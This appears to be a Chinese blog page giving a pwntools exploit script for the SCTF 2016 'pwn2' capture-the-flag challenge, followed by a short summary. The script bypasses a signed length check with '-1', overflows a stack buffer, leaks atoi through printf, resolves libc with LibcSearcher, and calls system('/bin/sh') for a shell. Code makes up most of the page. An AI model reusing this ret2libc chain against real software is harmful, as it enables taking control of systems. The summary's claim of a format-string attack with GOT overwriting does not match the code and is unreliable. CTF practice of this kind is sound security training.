from pwn import *
from LibcSearcher import *
main = 0x080485B8
gotatoi = 0x0804A020
formatstr = 0x080486F8
pltprintf = 0x08048370
p = process('./pwn2_sctf_2016')
p.recvuntil("How many bytes do you want me to read? ")
p.sendline('-1')
p.recvuntil("data!\n")
payload = 48*'a' + p32(pltprintf) + p32(main) + p32(formatstr) + p32(gotatoi)
p.sendline(payload)
p.recvuntil("You said: ")
p.recvuntil("You said: ")
realatoi = u32(p.recv(4).ljust(4,'\x00'))
libc = LibcSearcher('atoi', realatoi)
libcbase = realatoi - libc.dump('atoi')
system = libcbase + libc.dump('system')
binsh = libcbase + libc.dump('str_bin_sh')
p.recvuntil("How many bytes do you want me to read? ")
p.sendline('-1')
p.recvuntil("data!\n")
payload = 48*'a' + p32(system) + p32(main) + p32(binsh)
p.sendline(payload)
p.interactive()
sctf2016 pwn2
最新推荐文章于 2025-02-24 14:08:59 发布
本文深入剖析了PWN2_SCTF_2016挑战中的漏洞利用技巧,通过格式字符串攻击获取目标程序的控制权,进一步利用LibcSearcher定位系统调用地址,最终实现远程代码执行。文章详细展示了如何构造payload,利用got表覆盖技术,以及如何通过交互式shell完成攻击。
2692

被折叠的 条评论
为什么被折叠?



